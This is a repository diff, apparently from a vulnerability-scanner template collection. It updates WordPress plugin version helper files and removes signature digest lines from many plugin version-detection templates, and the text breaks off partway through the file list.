.../wordpress/plugins/health-check.yaml | 1 - .../wordpress/plugins/hello-dolly.yaml | 1 - .../plugins/host-webfonts-local.yaml | 1 - .../wordpress/plugins/hostinger.yaml | 1 - .../wordpress/plugins/image-optimization.yaml | 1 - .../wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/imsanity.yaml | 1 - .../plugins/insert-headers-and-footers.yaml | 1 - .../wordpress/plugins/instagram-feed.yaml | 1 - .../plugins/intuitive-custom-post-order.yaml | 1 - .../wordpress/plugins/jetpack-boost.yaml | 1 - .../wordpress/plugins/jetpack.yaml | 1 - .../wordpress/plugins/kadence-blocks.yaml | 1 - .../technologies/wordpress/plugins/kirki.yaml | 1 - .../wordpress/plugins/leadin.yaml | 1 - .../limit-login-attempts-reloaded.yaml | 1 - .../plugins/limit-login-attempts.yaml | 1 - .../wordpress/plugins/litespeed-cache.yaml | 1 - .../wordpress/plugins/loco-translate.yaml | 1 - .../wordpress/plugins/loginizer.yaml | 1 - .../plugins/mailchimp-for-woocommerce.yaml | 1 - .../wordpress/plugins/mailchimp-for-wp.yaml | 1 - .../wordpress/plugins/mailpoet.yaml | 1 - .../wordpress/plugins/maintenance.yaml | 1 - .../wordpress/plugins/mainwp-child.yaml | 1 - .../wordpress/plugins/malcare-security.yaml | 1 - .../wordpress/plugins/megamenu.yaml | 1 - .../wordpress/plugins/members.yaml | 1 - .../wordpress/plugins/meta-box.yaml | 1 - .../wordpress/plugins/metform.yaml | 1 - .../wordpress/plugins/ml-slider.yaml | 1 - .../wordpress/plugins/newsletter.yaml | 1 - .../plugins/nextend-facebook-connect.yaml | 1 - .../wordpress/plugins/nextgen-gallery.yaml | 1 - .../wordpress/plugins/ninja-forms.yaml | 1 - .../wordpress/plugins/ocean-extra.yaml | 1 - .../plugins/official-facebook-pixel.yaml | 1 - .../plugins/one-click-demo-import.yaml | 1 - .../wordpress/plugins/optinmonster.yaml | 1 - .../wordpress/plugins/otter-blocks.yaml | 1 - .../wordpress/plugins/password-protected.yaml | 1 - .../wordpress/plugins/pdf-embedder.yaml | 1 - .../plugins/pinterest-for-woocommerce.yaml | 1 - .../wordpress/plugins/pixelyoursite.yaml | 1 - .../wordpress/plugins/polylang.yaml | 1 - .../wordpress/plugins/popup-maker.yaml | 1 - .../wordpress/plugins/post-smtp.yaml | 1 - .../wordpress/plugins/post-types-order.yaml | 1 - .../plugins/premium-addons-for-elementor.yaml | 1 - .../wordpress/plugins/pretty-link.yaml | 1 - .../plugins/really-simple-captcha.yaml | 1 - .../wordpress/plugins/really-simple-ssl.yaml | 1 - .../wordpress/plugins/redirection.yaml | 1 - .../wordpress/plugins/redux-framework.yaml | 1 - .../plugins/regenerate-thumbnails.yaml | 1 - .../plugins/royal-elementor-addons.yaml | 1 - .../wordpress/plugins/safe-svg.yaml | 1 - .../wordpress/plugins/seo-by-rank-math.yaml | 1 - .../wordpress/plugins/sg-cachepress.yaml | 1 - .../wordpress/plugins/sg-security.yaml | 1 - .../plugins/shortcodes-ultimate.yaml | 1 - .../plugins/shortpixel-image-optimiser.yaml | 1 - .../plugins/simple-custom-post-order.yaml | 1 - .../wordpress/plugins/simple-history.yaml | 1 - .../wordpress/plugins/siteguard.yaml | 1 - .../wordpress/plugins/siteorigin-panels.yaml | 1 - .../wordpress/plugins/smart-slider-3.yaml | 1 - .../wordpress/plugins/so-widgets-bundle.yaml | 1 - .../sticky-header-effects-for-elementor.yaml | 1 - .../stops-core-theme-and-plugin-updates.yaml | 1 - .../wordpress/plugins/sucuri-scanner.yaml | 1 - .../plugins/table-of-contents-plus.yaml | 1 - .../wordpress/plugins/tablepress.yaml | 1 - .../plugins/taxonomy-terms-order.yaml | 1 - .../wordpress/plugins/templately.yaml | 1 - .../plugins/the-events-calendar.yaml | 1 - .../wordpress/plugins/tinymce-advanced.yaml | 1 - .../plugins/translatepress-multilingual.yaml | 1 - .../ultimate-addons-for-gutenberg.yaml | 1 - .../plugins/under-construction-page.yaml | 1 - .../wordpress/plugins/updraftplus.yaml | 1 - .../wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/w3-total-cache.yaml | 1 - .../plugins/webp-converter-for-media.yaml | 1 - .../wordpress/plugins/webp-express.yaml | 1 - .../plugins/widget-importer-exporter.yaml | 1 - .../woo-cart-abandonment-recovery.yaml | 1 - .../woo-checkout-field-editor-pro.yaml | 1 - .../plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-stripe.yaml | 1 - .../plugins/woocommerce-legacy-rest-api.yaml | 1 - .../plugins/woocommerce-payments.yaml | 1 - .../plugins/woocommerce-paypal-payments.yaml | 3 +- ...oocommerce-pdf-invoices-packing-slips.yaml | 1 - .../plugins/woocommerce-services.yaml | 1 - .../wordpress/plugins/woocommerce.yaml | 1 - .../wordpress/plugins/wordfence.yaml | 1 - .../wordpress/plugins/wordpress-importer.yaml | 1 - .../wordpress/plugins/wordpress-seo.yaml | 1 - .../wordpress/plugins/worker.yaml | 1 - .../wordpress/plugins/wp-crontrol.yaml | 48 +++++++++++++++++++ .../wordpress/plugins/wp-fastest-cache.yaml | 1 - .../wordpress/plugins/wp-file-manager.yaml | 1 - .../wordpress/plugins/wp-google-maps.yaml | 1 - .../wordpress/plugins/wp-mail-smtp.yaml | 1 - .../plugins/wp-maintenance-mode.yaml | 1 - .../wordpress/plugins/wp-migrate-db.yaml | 1 - .../wordpress/plugins/wp-multibyte-patch.yaml | 1 - .../wordpress/plugins/wp-optimize.yaml | 1 - .../wordpress/plugins/wp-pagenavi.yaml | 1 - .../wordpress/plugins/wp-reset.yaml | 1 - .../plugins/wp-reviews-plugin-for-google.yaml | 1 - .../wordpress/plugins/wp-rollback.yaml | 1 - .../wordpress/plugins/wp-seopress.yaml | 1 - .../wordpress/plugins/wp-sitemap-page.yaml | 1 - .../wordpress/plugins/wp-smushit.yaml | 1 - .../wordpress/plugins/wp-statistics.yaml | 1 - .../wordpress/plugins/wp-super-cache.yaml | 1 - .../wordpress/plugins/wpcf7-recaptcha.yaml | 1 - .../wordpress/plugins/wpcf7-redirect.yaml | 1 - .../wordpress/plugins/wpforms-lite.yaml | 1 - .../wordpress/plugins/wps-hide-login.yaml | 1 - .../plugins/wpvivid-backuprestore.yaml | 1 - .../plugins/yith-woocommerce-wishlist.yaml | 1 - 205 files changed, 54 insertions(+), 205 deletions(-) create mode 100644 http/technologies/wordpress/plugins/wp-crontrol.yaml diff --git a/helpers/wordpress/plugins/amp.txt b/helpers/wordpress/plugins/amp.txt index a4db534a2d..d21aa93ccd 100644 --- a/helpers/wordpress/plugins/amp.txt +++ b/helpers/wordpress/plugins/amp.txt @@ -1 +1 @@ -2.5.3 \ No newline at end of file +2.5.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index d9b2ac520b..86ad5938a3 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.22.3 \ No newline at end of file +3.23.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index 025b749b3a..21f81fe803 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.130.0 \ No newline at end of file +1.131.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index f0ad3287f9..a50bd44872 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.7.0 \ No newline at end of file +9.7.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt index f93ea0ca33..6acdb44289 100644 --- a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt +++ b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt @@ -1 +1 @@ -2.0.2 \ No newline at end of file +2.0.3 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 1f058d7d22..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203cfd657a163a51d6ea5d1ffcace355c3bbeac4b88e3f98ea005875c14ee6a446022100c281f7d2ca8628b2c9e03cbcac9fb2d89f1a37b04a98bdf15d8de42296ca8516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index c796735b9f..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203bd1df3450f4408d403e3c8647a83f2d10f3e5a538fcbd739252b55912f3ad660220711d63a5c1740ea635f331f1b395e5a6162d424eb6355a034bbb4c81e6a20ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index c947705607..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b7c4c23e9b78175f133be8fb3a5b364077942891083eb47188644b8b193256102203475786d505db3a5cea85b2a68d2b8041f8e2c992cd3fc63ee3be7d0ad0e93f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index a359ada3b0..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f273d9bb5a5800db9cb409844d00d78fec4a3cea580c1ce0ad8419cce74ab1302206d356f2cd8d9d88b8770c1c0343c06a9c7f26b1a9f0c40875974d2237ecf1b70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index edb8c235cc..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005f9bd434ae860d0557451f0955d772f8d3d4a6622a122158a98e77dd6b44e9f02203515951e0defd8f8386ca32042e6112d2708fa83b1bfc1f3d6d427da9e0d8597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 94110d9aa1..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0af74aa1b0309f5f438b3219709da1eca95f8d8d473f45e679bcce400a0276f022100f6f8455d8e61ec5ea15f6036489a9854902711ae3e1b492d9719cbdf2eb58dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index cedf65eabb..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e719c69eeb2e8afe161ed7df2ccb1b55e7e4e1a0279789d9c475349f6517eb8022100f4e5c711c932341c099166d06e5fdb5f734b77e158e11beaff0b0b721f5d1012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 598684daa0..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bd909cf9f7b3096c8bb2b372fa088ee47b02a656ac46253a8244307004b78e1502203ee92b615ece2db70a6dc51aa0d40f58ef8ba311c7253f157aeb43dcba10a1bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 9fe7ad453a..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206400dd13973b38a453d36677d8ad8cc9b3d4a18be4fa521345cb7b12fc415eba02201fe575039bef790f887e3f9add5b06a528b8022e1007b3e06a17757a90f6c169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index e828f8a27d..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036d7f2d8592acc18f02485d2f1b8f31c0cfce605bc8db078ebaaacd6cee099cb022100f21655e844531bff9b3d54519ea56c368305ab0e0fba6fbd9040974521c08b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 7f3d77e420..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220486205af7a7b8c46fde8599d0d373ee29a1594b501e6cd2b16c8ec0cf85261a60220108403c89e0d01edbdd0a09144a651405ab7171484efd8477ea3793c5e73b3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 0e6dea51ee..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009ca7266615490f6cdcf6ae734764dceb565b777b8a70a9fb3130d3252b2d8f902202b11fc679bb0290b4b57ab07600cdf83ddcc0563f830c6e051f34630d2287c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 79f1720d4c..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ab2d665d93a87ea30cfe859028d03e196e6bdd9665c7d8a737f5b192b345966022100d680e25c8038126ba7f6fed82a471a23ceb608eaf56f7822e7f484fa30271373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index aaf2cfcb3e..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b8929c38bc16bc860b0c60bb47e3c1488fca117dec3d9ca4d0192b305d18740a02200f863bb1cb74b3fb0e190cdfff4d327d3f156cd1b27dab27cbe0f73a8f5a1045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f6cab36458..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008f1ceb9e6b1250ee01679ec431db13f5197e09ea9f99c85900226ac03a044fff02210088bba8a371519726dd341bca5c9cb3f4ab86ba0aebdc9b4c97b6d84233327dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index a353721a9e..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206427cd8cead5e3e240698c81c7c8c3e9dbf09bb46ba30ce09f0ff3fff274d7c6022012c38f3b956383be24018adbc679d5c6d96ab4fabdba43035795f91d162d3b9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 5367ef60cf..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009eeb775c55bd4b3535d970b3b036c266f8dd0c87df12189ad70139f98da03527022100a904e15843f148fa55bed792fa3a82b2f2c5b076f8ce37713c3f7e990d824083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6b067af85f..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206730b8bc898affd0ce3da1830f8b895a487f0f41d843ba269827e725dc2313a6022100b06ed2403148a76e21a5e652a924bc378da04d4aa0a692bcb7334f36010234e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 155c160466..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085bc5cb80bcc35b1e9a5f6cce4806183cc13930f4b4be3e08aa8f5daae4b8ba2022100cea47ae1afd3b8b5c6fb1ae2bda64379ef45001e2075791c76c979ef83931a9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index bac2767798..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab49e179d8f0bb56970358efcce70a076d6e6822d4e14dc472aa146e69baae4e02204e6f9459827aadbcc3f58a059811dcbc50362bb6269331c7f53bd4e7b1353fec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6a19758c87..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022039ffae78b313888a856bf07ac7cf587bff1d491d20175933cb997e205514d62a02200e0739c11cce30e3c1c78d7a19f3ecc82941fd6dc9a970d37484e48b753cd609:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index e732ea1afb..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b75a45b3a2be7ca5f806385e92a0e261f648c32945891386705cfffcfca005d8022100c7b46bbd85fbbaae2d20fe9bba37fc0e64653246cb594d5d963b694fdcbd7b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 6605bc370b..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e5f6bcfa0b12bde2be684f09b34ac954eb9db81c9a354ddaf534f3b62479eaab022100bbde1a6a03f03e2a757933d2e39b250fe605dfd93ece4a56a3563261c29ac3f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 2ee534e692..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e35d05afe05a5b9f11304c44f8235a64145a40cb91de093c59a8a3c3d3a0900c0220465eb9d24e37135cadd08088b13210642fd580c27f663797e10703bc58749400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index b173eab2a5..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100893564c7a7c46cdeccf0e33330f66ace91664fd30c6b7766f14d56e4eeae93d002202b828f229d9881e37efb7d65107d633d1400448964dac235f213c2bbc158ab9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 47224616ed..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008857696ca5eea0797d763a2bdab2cee863947306d0c58524e01e6ec49a0da9c60221009403163d87ad72265bb94a8cdaed63598a65cd93bdc7bd832a548b17027cd64a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index fe640cffcf..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c63fda43b705b044e6b14bf1738018db4ec16b388438f7776bc2e0047cbe489c022100a5a7310f66aa1acde8874347906e3b445a9dca804e4b769b96484ec51a1823f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 0fa0addbdb..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d38fc87f0731a79774ac83022759deddd707255c9baea7f5b72eec441384ab5702205722018af7a9ccf9ad056466e0194f3510681a1e0be97ae82015e851972e1fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 12d10d8b38..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220661b89833b5ae6b3bcc185a66e4a548e3f4e0327f3dc5128b2160eb1fec8f30102206c09aab9dcfea188edaf92ece0390a3e7a9f49aa54f2d05d58abdfe09ab73ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index b9d7590df2..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203668622a4e87c4b4865f24b460661d7f86e627be23b5b83c9aaaf434532235c7022004f50f5f3e537d4b3d65b4ab6989e8f1977eb152529562c877aef029bff5fc81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 0f383c1176..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022058f293a946fecc6da72e9865fef09b8371a762d8c9e6108d2c3e28f76686bda50221008e7fef8351e428d49b6a2b738aa8a31c258530d98dd7f998edc8e291a409ab92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index bb51548362..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220607fff18b414cf42694e29df52c62a9438721703b1c24e64c733eb635ac88f80022100c565fa8bd4bb8e29339ce26a806204a3f2bc93294f186ea7cf4b7417d55387fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 1023993ceb..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220368cfad172de8e1418b9d67edeae7be929309ca7dcf78ebd6c9c4e1d12153b6802205c8738e9f5afae118dc957cd107f31790c3e0a0205a1a61a0e80792ef4bb1e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bab686eb73..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025412e4ea8b06dbb1e6467bc51f8f5efd1660a3d5bee0d80412061b3e4c50b04022100fc0d27b088a0b9de5135203b0ea6dd55cd9e39c681e1209d5469afdf0e3bfde0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 35170af76a..bca0326f2b 100644 --- 